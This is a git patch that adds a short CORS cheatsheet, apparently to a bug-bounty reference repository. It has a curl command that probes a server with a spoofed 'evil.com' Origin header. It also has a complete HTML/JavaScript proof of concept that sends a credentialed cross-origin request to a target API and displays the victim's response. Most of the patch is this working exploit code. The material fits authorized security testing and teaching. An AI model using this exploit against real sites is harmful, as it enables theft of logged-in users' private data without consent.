From a208ba5d18727562eebb0f1f0b956910e1d41955 Mon Sep 17 00:00:00 2001
From: sxcurity <sxcurity@gmail.com>
Date: Wed, 25 Oct 2017 10:53:04 -0500
Subject: [PATCH] Create cors.md

We should create a CORS cheatsheet. Will add more in the future.
---
 cheatsheets/cors.md | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 cheatsheets/cors.md

diff --git a/cheatsheets/cors.md b/cheatsheets/cors.md
new file mode 100644
index 0000000..dde6a4d
--- /dev/null
+++ b/cheatsheets/cors.md
@@ -0,0 +1,36 @@
+## Cross Origin Resource Sharing (CORS)
+
+Testing:
+`curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'`
+
+Check to see what the server responds with in the `Access-Control-Allow-Origin:` (if anything) and if so, check if `Access-Control-Allow-Credentials: true` is present.
+
+If it is trusting arbitrary origins **with** allow-credentials set to true, then host this HTML as a proof of concept.
+
+```
+<!DOCTYPE html>
+<html>
+<head><title>BugBounty CheatSheet</title></head>
+<body>
+<center>
+<h2>CORs POC</h2>
+
+<textarea rows="10" cols="60" id="pwnz">
+</textarea><br>
+<button type="button" onclick="cors()">Exploit</button>
+</div>
+
+<script>
+function cors() {
+  var xhttp = new XMLHttpRequest();
+  xhttp.onreadystatechange = function() {
+    if (this.readyState == 4 && this.status == 200) {
+      document.getElementById("pwnz").innerHTML = this.responseText;
+    }
+  };
+  xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
+  xhttp.withCredentials = true;
+  xhttp.send();
+}
+</script>
+```